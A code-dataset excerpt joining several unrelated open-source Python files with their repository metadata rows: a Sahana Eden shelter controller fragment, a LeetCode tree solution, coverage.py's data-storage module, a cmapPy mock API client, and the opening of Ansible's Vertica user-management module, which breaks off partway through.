limitby=(0, 1)).first()
if staff_id:
db.assess_rat.staff_id.default = staff_id.id
elif r.component.name == "presence":
if deployment_settings.get_ui_camp():
REGISTER_LABEL = T("Register Person into this Camp")
EMPTY_LIST = T("No People currently registered in this camp")
else:
REGISTER_LABEL = T("Register Person into this Shelter")
EMPTY_LIST = T("No People currently registered in this shelter")
# Hide the Implied fields
db.pr_presence.location_id.writable = False
db.pr_presence.location_id.default = r.record.location_id
db.pr_presence.location_id.comment = ""
db.pr_presence.proc_desc.readable = db.pr_presence.proc_desc.writable = False
# AT: Add Person
db.pr_presence.pe_id.comment = \
DIV(s3_person_comment(T("Add Person"), REGISTER_LABEL),
DIV(A(s3.crud_strings.pr_group.label_create_button,
_class="colorbox",
_href=URL(c="pr", f="group", args="create",
vars=dict(format="popup")),
_target="top",
_title=s3.crud_strings.pr_group.label_create_button),
DIV(_class="tooltip",
_title="%s|%s" % (T("Create Group Entry"),
T("Create a group entry in the registry.")))
)
)
db.pr_presence.pe_id.widget = S3AutocompleteWidget("pr", "pentity")
# Set defaults
db.pr_presence.datetime.default = request.utcnow
db.pr_presence.observer.default = s3_logged_in_person()
cr_shelter_presence_opts = {
vita.CHECK_IN: vita.presence_conditions[vita.CHECK_IN],
vita.CHECK_OUT: vita.presence_conditions[vita.CHECK_OUT]}
db.pr_presence.presence_condition.requires = IS_IN_SET(
cr_shelter_presence_opts, zero=None)
db.pr_presence.presence_condition.default = vita.CHECK_IN
# Change the Labels
s3.crud_strings.pr_presence = Storage(
title_create = T("Register Person"),
title_display = T("Registration Details"),
title_list = T("Registered People"),
title_update = T("Edit Registration"),
title_search = T("Search Registations"),
subtitle_create = REGISTER_LABEL,
subtitle_list = T("Current Registrations"),
label_list_button = T("List Registrations"),
label_create_button = T("Register Person"),
msg_record_created = T("Registration added"),
msg_record_modified = T("Registration updated"),
msg_record_deleted = T("Registration entry deleted"),
msg_list_empty = EMPTY_LIST
)
elif r.component.name == "req":
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
response.s3.req_create_form_mods()
return True
# =============================================================================
def incoming():
""" Incoming Shipments """
s3mgr.load("inv_inv_item")
try:
return response.s3.inv_incoming()
except TypeError:
return None
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests """
s3mgr.load("req_req")
try:
return response.s3.req_match()
except TypeError:
return None
# =============================================================================
# This code provides urls of the form:
# http://.../eden/cr/call/<service>/rpc/<method>/<id>
# e.g.:
# http://.../eden/cr/call/jsonrpc/rpc/list/2
# It is not currently in use but left in as an example, and because it may
# be used in future for interoperating with or transferring data from Agasti
# which uses xml-rpc. See:
# http://www.web2py.com/examples/default/tools#services
# http://groups.google.com/group/web2py/browse_thread/thread/53086d5f89ac3ae2
def call():
"Call an XMLRPC, JSONRPC or RSS service"
return service()
@service.jsonrpc
@service.xmlrpc
@service.amfrpc
def rpc(method, id=0):
if method == "list":
return db().select(db.cr_shelter.ALL).as_list()
if method == "read":
return db(db.cr_shelter.id == id).select().as_list()
if method == "delete":
status=db(db.cr_shelter.id == id).delete()
if status:
return "Success - record %d deleted!" % id
else:
return "Failed - no record %d!" % id
else:
return "Method not implemented!"
@service.xmlrpc
def create(name):
# Need to do validation manually!
id = db.cr_shelter.insert(name=name)
return id
@service.xmlrpc
def update(id, name):
# Need to do validation manually!
status = db(db.cr_shelter.id == id).update(name=name)
#@todo: audit!
if status:
return "Success - record %d updated!" % id
else:
return "Failed - no record %d!" % id
| mit | 2,831,012,067,847,777,000 | 38.756447 | 95 | 0.510486 | false |
lmmsoft/LeetCode | LeetCode-Algorithm/1123. Lowest Common Ancestor of Deepest Leaves/1123.py | 1 | 2318 | # Definition for a binary tree node.
from typing import Dict, List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves1(self, root: TreeNode) -> TreeNode:
self.parent: Dict[TreeNode, TreeNode] = {}
self.deep_list: Dict[int, List[TreeNode]] = {}
def dfs(n: TreeNode, deep: int):
if deep in self.deep_list:
self.deep_list[deep].append(n)
else:
self.deep_list[deep] = [n]
if n.left:
self.parent[n.left] = n
dfs(n.left, deep + 1)
if n.right:
self.parent[n.right] = n
dfs(n.right, deep + 1)
dfs(root, 0)
max_deep: int = max(self.deep_list.keys())
leaves: list = self.deep_list[max_deep]
while True:
s = set()
for l in leaves:
s.add(l)
if len(s) == 1:
return list(s)[0]
else:
leaves = [self.parent[leaf] for leaf in leaves]
return None
# rank 11 superluminal
# 类似的思路,使用 BFS 实现
def lcaDeepestLeaves(self, root: TreeNode) -> TreeNode:
"""
:type root: TreeNode
:rtype: TreeNode
"""
parent = {}
queue = set([root])
while True:
next_queue = set()
for node in queue:
for child in (node.left, node.right):
if child:
parent[child] = node
next_queue.add(child)
if not next_queue:
break
queue = next_queue
# 此时的queue就是所有的叶子节点,因为他们的next_queue是空的
while len(queue) > 1:
queue = set(parent[n] for n in queue)
for node in queue:
return node
if __name__ == '__main__':
n1 = TreeNode(1)
n2 = TreeNode(2)
n3 = TreeNode(3)
n4 = TreeNode(4)
n5 = TreeNode(5)
n1.left = n2
n1.right = n3
assert Solution().lcaDeepestLeaves(n1) == n1
n2.left = n4
assert Solution().lcaDeepestLeaves(n1) == n4
n2.right = n5
assert Solution().lcaDeepestLeaves(n1) == n2
| gpl-2.0 | -2,714,826,590,182,496,000 | 25.232558 | 63 | 0.490248 | false |
sdeepanshu02/microblog | flask/Lib/site-packages/coverage/data.py | 40 | 27599 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Coverage data for coverage.py."""
import glob
import itertools
import json
import optparse
import os
import os.path
import random
import re
import socket
from coverage import env
from coverage.backward import iitems, string_class
from coverage.debug import _TEST_NAME_FILE
from coverage.files import PathAliases
from coverage.misc import CoverageException, file_be_gone, isolate_module
os = isolate_module(os)
class CoverageData(object):
"""Manages collected coverage data, including file storage.
This class is the public supported API to the data coverage.py collects
during program execution. It includes information about what code was
executed. It does not include information from the analysis phase, to
determine what lines could have been executed, or what lines were not
executed.
.. note::
The file format is not documented or guaranteed. It will change in
the future, in possibly complicated ways. Do not read coverage.py
data files directly. Use this API to avoid disruption.
There are a number of kinds of data that can be collected:
* **lines**: the line numbers of source lines that were executed.
These are always available.
* **arcs**: pairs of source and destination line numbers for transitions
between source lines. These are only available if branch coverage was
used.
* **file tracer names**: the module names of the file tracer plugins that
handled each file in the data.
* **run information**: information about the program execution. This is
written during "coverage run", and then accumulated during "coverage
combine".
Lines, arcs, and file tracer names are stored for each source file. File
names in this API are case-sensitive, even on platforms with
case-insensitive file systems.
To read a coverage.py data file, use :meth:`read_file`, or
:meth:`read_fileobj` if you have an already-opened file. You can then
access the line, arc, or file tracer data with :meth:`lines`, :meth:`arcs`,
or :meth:`file_tracer`. Run information is available with
:meth:`run_infos`.
The :meth:`has_arcs` method indicates whether arc data is available. You
can get a list of the files in the data with :meth:`measured_files`.
A summary of the line data is available from :meth:`line_counts`. As with
most Python containers, you can determine if there is any data at all by
using this object as a boolean value.
Most data files will be created by coverage.py itself, but you can use
methods here to create data files if you like. The :meth:`add_lines`,
:meth:`add_arcs`, and :meth:`add_file_tracers` methods add data, in ways
that are convenient for coverage.py. The :meth:`add_run_info` method adds
key-value pairs to the run information.
To add a file without any measured data, use :meth:`touch_file`.
You write to a named file with :meth:`write_file`, or to an already opened
file with :meth:`write_fileobj`.
You can clear the data in memory with :meth:`erase`. Two data collections
can be combined by using :meth:`update` on one :class:`CoverageData`,
passing it the other.
"""
# The data file format is JSON, with these keys:
#
# * lines: a dict mapping file names to lists of line numbers
# executed::
#
# { "file1": [17,23,45], "file2": [1,2,3], ... }
#
# * arcs: a dict mapping file names to lists of line number pairs::
#
# { "file1": [[17,23], [17,25], [25,26]], ... }
#
# * file_tracers: a dict mapping file names to plugin names::
#
# { "file1": "django.coverage", ... }
#
# * runs: a list of dicts of information about the coverage.py runs
# contributing to the data::
#
# [ { "brief_sys": "CPython 2.7.10 Darwin" }, ... ]
#
# Only one of `lines` or `arcs` will be present: with branch coverage, data
# is stored as arcs. Without branch coverage, it is stored as lines. The
# line data is easily recovered from the arcs: it is all the first elements
# of the pairs that are greater than zero.
def __init__(self, debug=None):
"""Create a CoverageData.
`debug` is a `DebugControl` object for writing debug messages.
"""
self._debug = debug
# A map from canonical Python source file name to a dictionary in
# which there's an entry for each line number that has been
# executed:
#
# { 'filename1.py': [12, 47, 1001], ... }
#
self._lines = None
# A map from canonical Python source file name to a dictionary with an
# entry for each pair of line numbers forming an arc:
#
# { 'filename1.py': [(12,14), (47,48), ... ], ... }
#
self._arcs = None
# A map from canonical source file name to a plugin module name:
#
# { 'filename1.py': 'django.coverage', ... }
#
self._file_tracers = {}
# A list of dicts of information about the coverage.py runs.
self._runs = []
def __repr__(self):
return "<{klass} lines={lines} arcs={arcs} tracers={tracers} runs={runs}>".format(
klass=self.__class__.__name__,
lines="None" if self._lines is None else "{{{0}}}".format(len(self._lines)),
arcs="None" if self._arcs is None else "{{{0}}}".format(len(self._arcs)),
tracers="{{{0}}}".format(len(self._file_tracers)),
runs="[{0}]".format(len(self._runs)),
)
##
## Reading data
##
def has_arcs(self):
"""Does this data have arcs?
Arc data is only available if branch coverage was used during
collection.
Returns a boolean.
"""
return self._has_arcs()
def lines(self, filename):
"""Get the list of lines executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no lines executed, in which case an empty list is returned.
If the file was executed, returns a list of integers, the line numbers
executed in the file. The list is in no particular order.
"""
if self._arcs is not None:
arcs = self._arcs.get(filename)
if arcs is not None:
all_lines = itertools.chain.from_iterable(arcs)
return list(set(l for l in all_lines if l > 0))
elif self._lines is not None:
return self._lines.get(filename)
return None
def arcs(self, filename):
"""Get the list of arcs executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no arcs executed, in which case an empty list is returned.
If the file was executed, returns a list of 2-tuples of integers. Each
pair is a starting line number and an ending line number for a
transition from one line to another. The list is in no particular
order.
Negative numbers have special meaning. If the starting line number is
-N, it represents an entry to the code object that starts at line N.
If the ending ling number is -N, it's an exit from the code object that
starts at line N.
"""
if self._arcs is not None:
if filename in self._arcs:
return self._arcs[filename]
return None
def file_tracer(self, filename):
"""Get the plugin name of the file tracer for a file.
Returns the name of the plugin that handles this file. If the file was
measured, but didn't use a plugin, then "" is returned. If the file
was not measured, then None is returned.
"""
# Because the vast majority of files involve no plugin, we don't store
# them explicitly in self._file_tracers. Check the measured data
# instead to see if it was a known file with no plugin.
if filename in (self._arcs or self._lines or {}):
return self._file_tracers.get(filename, "")
return None
def run_infos(self):
"""Return the list of dicts of run information.
For data collected during a single run, this will be a one-element
list. If data has been combined, there will be one element for each
original data file.
"""
return self._runs
def measured_files(self):
"""A list of all files that had been measured."""
return list(self._arcs or self._lines or {})
def line_counts(self, fullpath=False):
"""Return a dict summarizing the line coverage data.
Keys are based on the file names, and values are the number of executed
lines. If `fullpath` is true, then the keys are the full pathnames of
the files, otherwise they are the basenames of the files.
Returns a dict mapping file names to counts of lines.
"""
summ = {}
if fullpath:
filename_fn = lambda f: f
else:
filename_fn = os.path.basename
for filename in self.measured_files():
summ[filename_fn(filename)] = len(self.lines(filename))
return summ
def __nonzero__(self):
return bool(self._lines or self._arcs)
__bool__ = __nonzero__
def read_fileobj(self, file_obj):
"""Read the coverage data from the given file object.
Should only be used on an empty CoverageData object.
"""
data = self._read_raw_data(file_obj)
self._lines = self._arcs = None
if 'lines' in data:
self._lines = data['lines']
if 'arcs' in data:
self._arcs = dict(
(fname, [tuple(pair) for pair in arcs])
for fname, arcs in iitems(data['arcs'])
)
self._file_tracers = data.get('file_tracers', {})
self._runs = data.get('runs', [])
self._validate()
def read_file(self, filename):
"""Read the coverage data from `filename` into this object."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Reading data from %r" % (filename,))
try:
with self._open_for_reading(filename) as f:
self.read_fileobj(f)
except Exception as exc:
raise CoverageException(
"Couldn't read data from '%s': %s: %s" % (
filename, exc.__class__.__name__, exc,
)
)
_GO_AWAY = "!coverage.py: This is a private format, don't read it directly!"
@classmethod
def _open_for_reading(cls, filename):
"""Open a file appropriately for reading data."""
return open(filename, "r")
@classmethod
def _read_raw_data(cls, file_obj):
"""Read the raw data from a file object."""
go_away = file_obj.read(len(cls._GO_AWAY))
if go_away != cls._GO_AWAY:
raise CoverageException("Doesn't seem to be a coverage.py data file")
return json.load(file_obj)
@classmethod
def _read_raw_data_file(cls, filename):
"""Read the raw data from a file, for debugging."""
with cls._open_for_reading(filename) as f:
return cls._read_raw_data(f)
##
## Writing data
##
def add_lines(self, line_data):
"""Add measured line data.
`line_data` is a dictionary mapping file names to dictionaries::
{ filename: { lineno: None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding lines: %d files, %d lines total" % (
len(line_data), sum(len(lines) for lines in line_data.values())
))
if self._has_arcs():
raise CoverageException("Can't add lines to existing arc data")
if self._lines is None:
self._lines = {}
for filename, linenos in iitems(line_data):
if filename in self._lines:
new_linenos = set(self._lines[filename])
new_linenos.update(linenos)
linenos = new_linenos
self._lines[filename] = list(linenos)
self._validate()
def add_arcs(self, arc_data):
"""Add measured arc data.
`arc_data` is a dictionary mapping file names to dictionaries::
{ filename: { (l1,l2): None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding arcs: %d files, %d arcs total" % (
len(arc_data), sum(len(arcs) for arcs in arc_data.values())
))
if self._has_lines():
raise CoverageException("Can't add arcs to existing line data")
if self._arcs is None:
self._arcs = {}
for filename, arcs in iitems(arc_data):
if filename in self._arcs:
new_arcs = set(self._arcs[filename])
new_arcs.update(arcs)
arcs = new_arcs
self._arcs[filename] = list(arcs)
self._validate()
def add_file_tracers(self, file_tracers):
"""Add per-file plugin information.
`file_tracers` is { filename: plugin_name, ... }
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding file tracers: %d files" % (len(file_tracers),))
existing_files = self._arcs or self._lines or {}
for filename, plugin_name in iitems(file_tracers):
if filename not in existing_files:
raise CoverageException(
"Can't add file tracer data for unmeasured file '%s'" % (filename,)
)
existing_plugin = self._file_tracers.get(filename)
if existing_plugin is not None and plugin_name != existing_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, existing_plugin, plugin_name,
)
)
self._file_tracers[filename] = plugin_name
self._validate()
def add_run_info(self, **kwargs):
"""Add information about the run.
Keywords are arbitrary, and are stored in the run dictionary. Values
must be JSON serializable. You may use this function more than once,
but repeated keywords overwrite each other.
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding run info: %r" % (kwargs,))
if not self._runs:
self._runs = [{}]
self._runs[0].update(kwargs)
self._validate()
def touch_file(self, filename):
"""Ensure that `filename` appears in the data, empty if needed."""
if self._debug and self._debug.should('dataop'):
self._debug.write("Touching %r" % (filename,))
if not self._has_arcs() and not self._has_lines():
raise CoverageException("Can't touch files in an empty CoverageData")
if self._has_arcs():
where = self._arcs
else:
where = self._lines
where.setdefault(filename, [])
self._validate()
def write_fileobj(self, file_obj):
"""Write the coverage data to `file_obj`."""
# Create the file data.
file_data = {}
if self._has_arcs():
file_data['arcs'] = self._arcs
if self._has_lines():
file_data['lines'] = self._lines
if self._file_tracers:
file_data['file_tracers'] = self._file_tracers
if self._runs:
file_data['runs'] = self._runs
# Write the data to the file.
file_obj.write(self._GO_AWAY)
json.dump(file_data, file_obj)
def write_file(self, filename):
"""Write the coverage data to `filename`."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Writing data to %r" % (filename,))
with open(filename, 'w') as fdata:
self.write_fileobj(fdata)
def erase(self):
"""Erase the data in this object."""
self._lines = None
self._arcs = None
self._file_tracers = {}
self._runs = []
self._validate()
def update(self, other_data, aliases=None):
"""Update this data with data from another `CoverageData`.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
"""
if self._has_lines() and other_data._has_arcs():
raise CoverageException("Can't combine arc data with line data")
if self._has_arcs() and other_data._has_lines():
raise CoverageException("Can't combine line data with arc data")
aliases = aliases or PathAliases()
# _file_tracers: only have a string, so they have to agree.
# Have to do these first, so that our examination of self._arcs and
# self._lines won't be confused by data updated from other_data.
for filename in other_data.measured_files():
other_plugin = other_data.file_tracer(filename)
filename = aliases.map(filename)
this_plugin = self.file_tracer(filename)
if this_plugin is None:
if other_plugin:
self._file_tracers[filename] = other_plugin
elif this_plugin != other_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, this_plugin, other_plugin,
)
)
# _runs: add the new runs to these runs.
self._runs.extend(other_data._runs)
# _lines: merge dicts.
if other_data._has_lines():
if self._lines is None:
self._lines = {}
for filename, file_lines in iitems(other_data._lines):
filename = aliases.map(filename)
if filename in self._lines:
lines = set(self._lines[filename])
lines.update(file_lines)
file_lines = list(lines)
self._lines[filename] = file_lines
# _arcs: merge dicts.
if other_data._has_arcs():
if self._arcs is None:
self._arcs = {}
for filename, file_arcs in iitems(other_data._arcs):
filename = aliases.map(filename)
if filename in self._arcs:
arcs = set(self._arcs[filename])
arcs.update(file_arcs)
file_arcs = list(arcs)
self._arcs[filename] = file_arcs
self._validate()
##
## Miscellaneous
##
def _validate(self):
"""If we are in paranoid mode, validate that everything is right."""
if env.TESTING:
self._validate_invariants()
def _validate_invariants(self):
"""Validate internal invariants."""
# Only one of _lines or _arcs should exist.
assert not(self._has_lines() and self._has_arcs()), (
"Shouldn't have both _lines and _arcs"
)
# _lines should be a dict of lists of ints.
if self._has_lines():
for fname, lines in iitems(self._lines):
assert isinstance(fname, string_class), "Key in _lines shouldn't be %r" % (fname,)
assert all(isinstance(x, int) for x in lines), (
"_lines[%r] shouldn't be %r" % (fname, lines)
)
# _arcs should be a dict of lists of pairs of ints.
if self._has_arcs():
for fname, arcs in iitems(self._arcs):
assert isinstance(fname, string_class), "Key in _arcs shouldn't be %r" % (fname,)
assert all(isinstance(x, int) and isinstance(y, int) for x, y in arcs), (
"_arcs[%r] shouldn't be %r" % (fname, arcs)
)
# _file_tracers should have only non-empty strings as values.
for fname, plugin in iitems(self._file_tracers):
assert isinstance(fname, string_class), (
"Key in _file_tracers shouldn't be %r" % (fname,)
)
assert plugin and isinstance(plugin, string_class), (
"_file_tracers[%r] shoudn't be %r" % (fname, plugin)
)
# _runs should be a list of dicts.
for val in self._runs:
assert isinstance(val, dict)
for key in val:
assert isinstance(key, string_class), "Key in _runs shouldn't be %r" % (key,)
def add_to_hash(self, filename, hasher):
"""Contribute `filename`'s data to the `hasher`.
`hasher` is a `coverage.misc.Hasher` instance to be updated with
the file's data. It should only get the results data, not the run
data.
"""
if self._has_arcs():
hasher.update(sorted(self.arcs(filename) or []))
else:
hasher.update(sorted(self.lines(filename) or []))
hasher.update(self.file_tracer(filename))
##
## Internal
##
def _has_lines(self):
"""Do we have data in self._lines?"""
return self._lines is not None
def _has_arcs(self):
"""Do we have data in self._arcs?"""
return self._arcs is not None
class CoverageDataFiles(object):
"""Manage the use of coverage data files."""
def __init__(self, basename=None, warn=None):
"""Create a CoverageDataFiles to manage data files.
`warn` is the warning function to use.
`basename` is the name of the file to use for storing data.
"""
self.warn = warn
# Construct the file name that will be used for data storage.
self.filename = os.path.abspath(basename or ".coverage")
def erase(self, parallel=False):
"""Erase the data from the file storage.
If `parallel` is true, then also deletes data files created from the
basename by parallel-mode.
"""
file_be_gone(self.filename)
if parallel:
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
pattern = os.path.join(os.path.abspath(data_dir), localdot)
for filename in glob.glob(pattern):
file_be_gone(filename)
def read(self, data):
"""Read the coverage data."""
if os.path.exists(self.filename):
data.read_file(self.filename)
def write(self, data, suffix=None):
"""Write the collected coverage data to a file.
`suffix` is a suffix to append to the base file name. This can be used
for multiple or parallel execution, so that many coverage data files
can exist simultaneously. A dot will be used to join the base name and
the suffix.
"""
filename = self.filename
if suffix is True:
# If data_suffix was a simple true value, then make a suffix with
# plenty of distinguishing information. We do this here in
# `save()` at the last minute so that the pid will be correct even
# if the process forks.
extra = ""
if _TEST_NAME_FILE: # pragma: debugging
with open(_TEST_NAME_FILE) as f:
test_name = f.read()
extra = "." + test_name
suffix = "%s%s.%s.%06d" % (
socket.gethostname(), extra, os.getpid(),
random.randint(0, 999999)
)
if suffix:
filename += "." + suffix
data.write_file(filename)
def combine_parallel_data(self, data, aliases=None, data_paths=None):
"""Combine a number of data files together.
Treat `self.filename` as a file prefix, and combine the data from all
of the data files starting with that prefix plus a dot.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
If `data_paths` is provided, it is a list of directories or files to
combine. Directories are searched for files that start with
`self.filename` plus dot as a prefix, and those files are combined.
If `data_paths` is not provided, then the directory portion of
`self.filename` is used as the directory to search for data files.
Every data file found and combined is then deleted from disk. If a file
cannot be read, a warning will be issued, and the file will not be
deleted.
"""
# Because of the os.path.abspath in the constructor, data_dir will
# never be an empty string.
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
data_paths = data_paths or [data_dir]
files_to_combine = []
for p in data_paths:
if os.path.isfile(p):
files_to_combine.append(os.path.abspath(p))
elif os.path.isdir(p):
pattern = os.path.join(os.path.abspath(p), localdot)
files_to_combine.extend(glob.glob(pattern))
else:
raise CoverageException("Couldn't combine from non-existent path '%s'" % (p,))
for f in files_to_combine:
new_data = CoverageData()
try:
new_data.read_file(f)
except CoverageException as exc:
if self.warn:
# The CoverageException has the file name in it, so just
# use the message as the warning.
self.warn(str(exc))
else:
data.update(new_data, aliases=aliases)
file_be_gone(f)
def canonicalize_json_data(data):
"""Canonicalize our JSON data so it can be compared."""
for fname, lines in iitems(data.get('lines', {})):
data['lines'][fname] = sorted(lines)
for fname, arcs in iitems(data.get('arcs', {})):
data['arcs'][fname] = sorted(arcs)
def pretty_data(data):
"""Format data as JSON, but as nicely as possible.
Returns a string.
"""
# Start with a basic JSON dump.
out = json.dumps(data, indent=4, sort_keys=True)
# But pairs of numbers shouldn't be split across lines...
out = re.sub(r"\[\s+(-?\d+),\s+(-?\d+)\s+]", r"[\1, \2]", out)
# Trailing spaces mess with tests, get rid of them.
out = re.sub(r"(?m)\s+$", "", out)
return out
def debug_main(args):
"""Dump the raw data from data files.
Run this as::
$ python -m coverage.data [FILE]
"""
parser = optparse.OptionParser()
parser.add_option(
"-c", "--canonical", action="store_true",
help="Sort data into a canonical order",
)
options, args = parser.parse_args(args)
for filename in (args or [".coverage"]):
print("--- {0} ------------------------------".format(filename))
data = CoverageData._read_raw_data_file(filename)
if options.canonical:
canonicalize_json_data(data)
print(pretty_data(data))
if __name__ == '__main__':
import sys
debug_main(sys.argv[1:])
| bsd-3-clause | 2,881,497,314,506,380,000 | 34.936198 | 98 | 0.578717 | false |
cmap/cmapPy | cmapPy/clue_api_client/mock_clue_api_client.py | 1 | 1622 | import logging
import cmapPy.clue_api_client.setup_logger as setup_logger
import cmapPy.clue_api_client.clue_api_client as clue_api_client
__authors__ = "David L. Lahr"
__email__ = "[email protected]"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
class MockClueApiClient(clue_api_client.ClueApiClient):
def __init__(self, base_url=None, user_key=None, default_return_values=None, filter_query_result=None,
count_query_result=None, post_result=None, delete_result=None, put_result=None):
super(MockClueApiClient, self).__init__(base_url=base_url, user_key=user_key)
self.default_return_values = default_return_values if default_return_values else []
self.filter_query_result = filter_query_result if filter_query_result else self.default_return_values
self.count_query_result = count_query_result if count_query_result else self.default_return_values
self.post_result = post_result if post_result else self.default_return_values
self.delete_result = delete_result if delete_result else self.default_return_values
self.put_result = put_result if put_result else self.default_return_values
def run_filter_query(self, resource_name, filter_clause):
return self.filter_query_result
def run_count_query(self, resource_name, where_clause):
return self.count_query_result
def run_post(self, resource_name, data):
return self.post_result
def run_delete(self, resource_name, id):
return self.delete_result
def run_put(self, resource_name, id, data):
return self.put_result
| bsd-3-clause | 1,116,288,068,484,164,100 | 36.72093 | 109 | 0.718249 | false |
maxamillion/ansible-modules-extras | database/vertica/vertica_user.py | 15 | 14712 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: vertica_user
version_added: '2.0'
short_description: Adds or removes Vertica database users and assigns roles.
description:
- Adds or removes Vertica database user and, optionally, assigns roles.
- A user will not be removed until all the dependencies have been dropped.
- In such a situation, if the module tries to remove the user it
will fail and only remove roles granted to the user.
options:
name:
description:
- Name of the user to add or remove.
required: true
profile:
description:
- Sets the user's profile.
required: false
default: null
resource_pool:
description:
- Sets the user's resource pool.
required: false
default: null
password:
description:
- The user's password encrypted by the MD5 algorithm.
- The password must be generated with the format C("md5" + md5[password + username]),
resulting in a total of 35 characters. An easy way to do this is by querying
the Vertica database with select 'md5'||md5('<user_password><user_name>').
required: false
default: null
expired:
description:
- Sets the user's password expiration.
required: false
default: null
ldap:
description:
- Set to true if users are authenticated via LDAP.
- The user will be created with password expired and set to I($ldap$).
required: false
default: null
roles:
description:
- Comma separated list of roles to assign to the user.
aliases: ['role']
required: false
default: null
state:
description:
- Whether to create C(present), drop C(absent) or lock C(locked) a user.
required: false
choices: ['present', 'absent', 'locked']
default: present
db:
description:
- Name of the Vertica database.
required: false
default: null
cluster:
description:
- Name of the Vertica cluster.
required: false
default: localhost
port:
description:
- Vertica cluster port to connect to.
required: false
default: 5433
login_user:
description:
- The username used to authenticate with.
required: false
default: dbadmin
login_password:
description:
- The password used to authenticate with.
required: false
default: null
notes:
- The default authentication assumes that you are either logging in as or sudo'ing
to the C(dbadmin) account on the host.
- This module uses C(pyodbc), a Python ODBC database adapter. You must ensure
that C(unixODBC) and C(pyodbc) is installed on the host and properly configured.
- Configuring C(unixODBC) for Vertica requires C(Driver = /opt/vertica/lib64/libverticaodbc.so)
to be added to the C(Vertica) section of either C(/etc/odbcinst.ini) or C($HOME/.odbcinst.ini)
and both C(ErrorMessagesPath = /opt/vertica/lib64) and C(DriverManagerEncoding = UTF-16)
to be added to the C(Driver) section of either C(/etc/vertica.ini) or C($HOME/.vertica.ini).
requirements: [ 'unixODBC', 'pyodbc' ]
author: "Dariusz Owczarek (@dareko)"
"""
EXAMPLES = """
- name: creating a new vertica user with password
vertica_user: name=user_name password=md5<encrypted_password> db=db_name state=present
- name: creating a new vertica user authenticated via ldap with roles assigned
vertica_user:
name=user_name
ldap=true
db=db_name
roles=schema_name_ro
state=present
"""
try:
import pyodbc
except ImportError:
pyodbc_found = False
else:
pyodbc_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
class NotSupportedError(Exception):
pass
class CannotDropError(Exception):
pass
# module specific functions
def get_user_facts(cursor, user=''):
facts = {}
cursor.execute("""
select u.user_name, u.is_locked, u.lock_time,
p.password, p.acctexpired as is_expired,
u.profile_name, u.resource_pool,
u.all_roles, u.default_roles
from users u join password_auditor p on p.user_id = u.user_id
where not u.is_super_user
and (? = '' or u.user_name ilike ?)
""", user, user)
while True:
rows = cursor.fetchmany(100)
if not rows:
break
for row in rows:
user_key = row.user_name.lower()
facts[user_key] = {
'name': row.user_name,
'locked': str(row.is_locked),
'password': row.password,
'expired': str(row.is_expired),
'profile': row.profile_name,
'resource_pool': row.resource_pool,
'roles': [],
'default_roles': []}
if row.is_locked:
facts[user_key]['locked_time'] = str(row.lock_time)
if row.all_roles:
facts[user_key]['roles'] = row.all_roles.replace(' ', '').split(',')
if row.default_roles:
facts[user_key]['default_roles'] = row.default_roles.replace(' ', '').split(',')
return facts
def update_roles(user_facts, cursor, user,
existing_all, existing_default, required):
del_roles = list(set(existing_all) - set(required))
if del_roles:
cursor.execute("revoke {0} from {1}".format(','.join(del_roles), user))
new_roles = list(set(required) - set(existing_all))
if new_roles:
cursor.execute("grant {0} to {1}".format(','.join(new_roles), user))
if required:
cursor.execute("alter user {0} default role {1}".format(user, ','.join(required)))
def check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
return False
if profile and profile != user_facts[user_key]['profile']:
return False
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
return False
if locked != (user_facts[user_key]['locked'] == 'True'):
return False
if password and password != user_facts[user_key]['password']:
return False
if expired is not None and expired != (user_facts[user_key]['expired'] == 'True') or \
ldap is not None and ldap != (user_facts[user_key]['expired'] == 'True'):
return False
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
return False
return True
def present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
query_fragments = ["create user {0}".format(user)]
if locked:
query_fragments.append("account lock")
if password or ldap:
if password:
query_fragments.append("identified by '{0}'".format(password))
else:
query_fragments.append("identified by '$ldap$'")
if expired or ldap:
query_fragments.append("password expire")
if profile:
query_fragments.append("profile {0}".format(profile))
if resource_pool:
query_fragments.append("resource pool {0}".format(resource_pool))
cursor.execute(' '.join(query_fragments))
if resource_pool and resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
update_roles(user_facts, cursor, user, [], [], roles)
